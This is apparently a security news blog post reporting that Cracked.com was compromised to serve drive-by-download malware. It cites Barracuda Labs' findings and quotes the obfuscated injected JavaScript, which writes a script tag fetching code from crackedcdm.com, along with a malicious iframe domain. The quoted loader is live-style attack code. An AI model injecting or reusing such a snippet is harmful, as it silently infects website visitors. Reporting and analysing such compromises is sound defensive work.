Categories: Malware

Also Cracked_com compromised to serve malware

Barracuda Labs researches discovered that the popular humor website Cracked_com was compromised used by attackers to serve malware.

Cracked_com, the popular humor website, was compromised and used to serve malware that infected its visitors during the weekend and according to Barracuda Labs research the alarm could be not considered closed.

The attackers used the classic drive-by-downloads to spread the malicious code, despite it isn’t know the precise number of infected machines it is easy to imagine that a wide audience have been compromised considering that Cracked_com is one of most popular US websites.

Let’s consider also that at the time of this post the malware used is detected by 7 out of the 46 antivirus engines tested by virustotal.com, Barracuda Labs malware specialists claim that the infection is a stealthy one, the unique evidence of infection is represented by the fact that a java plugin has launched and that the system is running on low memory.

Popular websites are privileged targets for cyber criminals, a few weeks ago php.net website was compromised with the same purpose, it redirected visitors to Magnitude exploit kit compromising a great number of users.

The exploit was served with the following malicious javascript on cracked_com which sends a request to crackedcdm.com:

var tyi = “cdm.”; var itwo = “cracked”; var itto = “/”; var phw = “php”; var jfw = “src”; var fscr = “script”; var twi = “i”; var htp = “http”; var vol54 = “src”;document.write(“<”+fscr+” “+jfw+”=”+htp+”:”+itto+””+itto+””+twi+”.”+itwo+””+tyi+”com”+itto+””+twi+”.”+phw+”><”+itto+””+fscr+”>”);

The domain crackedcdm.com was registered on 2013-11-04, which suggests that attackers had the ability to serve their content from cracked_com at least that early.

Security experts have found on the Cracked_com iframe pointing to “p68ei5[dot]degreeexplore[dot]biz,” which then sent a collection of malicious Java, PDFs, HTML, and javascript files into the victim’s browser. If successful, the attackers are able to exploit the victim’s machine uploading the malware.

Cracked_com announced to have resolved the problem sometime Tuesday, but Barracuda Labs claimz the site is still infected.

Pierluigi Paganini

(Security Affairs – malware, Cracked_com)

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.